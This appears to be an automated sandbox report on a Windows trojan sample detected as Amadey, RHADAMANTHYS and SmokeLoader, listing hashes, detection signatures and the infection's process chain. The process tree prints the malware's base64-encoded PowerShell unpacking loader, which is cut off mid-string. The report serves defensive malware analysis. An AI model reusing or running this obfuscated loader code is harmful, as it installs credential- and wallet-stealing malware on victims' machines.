Edit tour
Windows
Analysis Report
xwREqjHUEv.exe
Overview
General Information
Sample name: | xwREqjHUEv.exerenamed because original name is a hash value |
Original sample name: | 068c05b9f062da142d266a374866d3bb.exe |
Analysis ID: | 1423732 |
MD5: | 068c05b9f062da142d266a374866d3bb |
SHA1: | 315726e1015e1e69cf9645bda713f463e93a8755 |
SHA256: | cce988ce6f528e02009122396aa4149091dbee5fbe8bcaabffaaa88ae02b127a |
Tags: | 32exetrojan |
Infos: | |
Detection
Amadey, RHADAMANTHYS, SmokeLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected Powershell dedcode and execute
Yara detected RHADAMANTHYS Stealer
Yara detected SmokeLoader
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (STR)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- xwREqjHUEv.exe (PID: 1788 cmdline:
"C:\Users\ user\Deskt op\xwREqjH UEv.exe" MD5: 068C05B9F062DA142D266A374866D3BB) - wscript.exe (PID: 6548 cmdline:
"wscript.e xe" "C:\Us ers\user\s tart.vbs" MD5: FF00E0480075B095948000BDC66E81F0) - cmd.exe (PID: 3816 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\tem p.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2788 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2964 cmdline:
"C:\Window s\SysWow64 \WindowsPo werShell\v 1.0\powers hell.exe" -command " [System.Te xt.Encodin g]::UTF8.G etString([ System.Con vert]::Fro mBase64Str ing('ZnVuY 3Rpb24gRGV jb21wcmVzc 0J5dGVzKCR jb21wcmVzc 2VkRGF0YSk geyAkbXMgP SBbSU8uTWV tb3J5U3RyZ WFtXTo6bmV 3KChbU3lzd GVtLkNvbnZ lcnRdOjpGc m9tQmFzZTY 0U3RyaW5nK CRjb21wcmV zc2VkRGF0Y SkpKTsgJG1 zLlBvc2l0a W9uID0gMDs gJGRlZmxhd GVTdHJlYW0 gPSBbSU8uQ 29tcHJlc3N pb24uRGVmb GF0ZVN0cmV hbV06Om5ld ygkbXMsIFt JTy5Db21wc mVzc2lvbi5 Db21wcmVzc 2lvbk1vZGV dOjpEZWNvb XByZXNzKTs gJGJ1ZmZlc iA9IFtieXR lW11dOjpuZ XcoNDA5Nik 7ICRtcyA9I FtJTy5NZW1 vcnlTdHJlY W1dOjpuZXc oKTsgd2hpb GUgKCR0cnV lKSB7ICRjb 3VudCA9ICR kZWZsYXRlU 3RyZWFtLlJ lYWQoJGJ1Z mZlciwgMCw gJGJ1ZmZlc i5MZW5ndGg pOyBpZiAoJ GNvdW50IC1 lcSAwKSB7I GJyZWFrIH0 gJG1zLldya XRlKCRidWZ mZXIsIDAsI CRjb3VudCk gfSAkZGVmb GF0ZVN0cmV hbS5DbG9zZ SgpOyAkbXM uVG9BcnJhe SgpIH0NCg0 KZnVuY3Rpb 24gUmV2ZXJ zZVN0cmluZ ygkaW5wdXR TdHJpbmcpI HsNCiAgICA kY2hhckFyc mF5ID0gJGl ucHV0U3Rya W5nLlRvQ2h hckFycmF5K CkgICMgQ29 udmVydCBzd HJpbmcgdG8 gY2hhcmFjd GVyIGFycmF 5DQogICAgJ HJldmVyc2V kQXJyYXkgP SAkY2hhckF ycmF5Wy0xL i4tKCRjaGF yQXJyYXkuT GVuZ3RoKV0 gICMgUmV2Z XJzZSB0aGU gYXJyYXkNC iAgICAkcmV 2ZXJzZWRTd HJpbmcgPSA tam9pbiAkc mV2ZXJzZWR BcnJheSAgI yBDb252ZXJ 0IHRoZSByZ XZlcnNlZCB hcnJheSBiY WNrIHRvIGE gc3RyaW5nD QogICAgcmV 0dXJuICRyZ XZlcnNlZFN 0cmluZw0Kf Q0KDQpmdW5 jdGlvbiBDb G9zZS1Qcm9 jZXNzIHsNC iAgICBwYXJ hbSgNCiAgI CAgICAgW3N 0cmluZ10kU HJvY2Vzc05 hbWUNCiAgI CApDQoNCiA gICAkcHJvY 2VzcyA9IEd ldC1Qcm9jZ XNzIC1OYW1 lICRQcm9jZ XNzTmFtZSA tRXJyb3JBY 3Rpb24gU2l sZW50bHlDb 250aW51ZQ0 KDQogICAga WYgKCRwcm9 jZXNzIC1uZ SAkbnVsbCk gew0KICAgI CAgICBTdG9 wLVByb2Nlc 3MgLU5hbWU gJFByb2Nlc 3NOYW1lIC1 Gb3JjZQ0KC X0NCn0NCg0 KZnVuY3Rpb 24gQ29udmV ydC1Bc2Npa VRvU3RyaW5 nKCRhc2Npa UFycmF5KXs NCiRvZmZTZ XRJbnRlZ2V yPTEyMzsNC iRkZWNvZGV kU3RyaW5nP SROdWxsOw0 KZm9yZWFja CgkYXNjaWl JbnRlZ2VyI GluICRhc2N paUFycmF5K XskZGVjb2R lZFN0cmluZ ys9W2NoYXJ dKCRhc2Npa UludGVnZXI tJG9mZlNld EludGVnZXI pfTsNCnJld HVybiAkZGV jb2RlZFN0c mluZ307DQo NCiRlbmNvZ GVkQXJyYXk gPSBAKDE1O SwyMjAsMjM 4LDIzOCwyM jQsMjMyLDI yMSwyMzEsM jQ0LDE2OSw xOTIsMjMzL DIzOSwyMzc sMjQ0LDIwM ywyMzQsMjI 4LDIzMywyM zksMTY5LDE 5NiwyMzMsM jQxLDIzNCw yMzAsMjI0L DE2MywxNTk sMjMzLDI0M CwyMzEsMjM xLDE2NywxN TksMjMzLDI 0MCwyMzEsM jMxLDE2NCw xODIpDQokZ GVjb2RlZFN 0cmluZyA9I ENvbnZlcnQ tQXNjaWlUb 1N0cmluZyA kZW5jb2RlZ EFycmF5DQo NCg0KJGZpb GVQYXRoID0 gSm9pbi1QY XRoICRlbnY 6VXNlclByb 2ZpbGUgIlV uZExkbC5iY XQiDQokbGF zdExpbmUgP SBHZXQtQ29 udGVudCAtU GF0aCAkZml sZVBhdGggf CBTZWxlY3Q tT2JqZWN0I C1MYXN0IDE NCiRjbGVhb mVkTGluZSA 9ICRsYXN0T GluZSAtcmV wbGFjZSAnX jo6Jw0KJHJ ldmVyc2UgP SBSZXZlcnN lU3RyaW5nI CRjbGVhbmV kTGluZQ0KJ GRlY29tcHJ lc3NlZEJ5d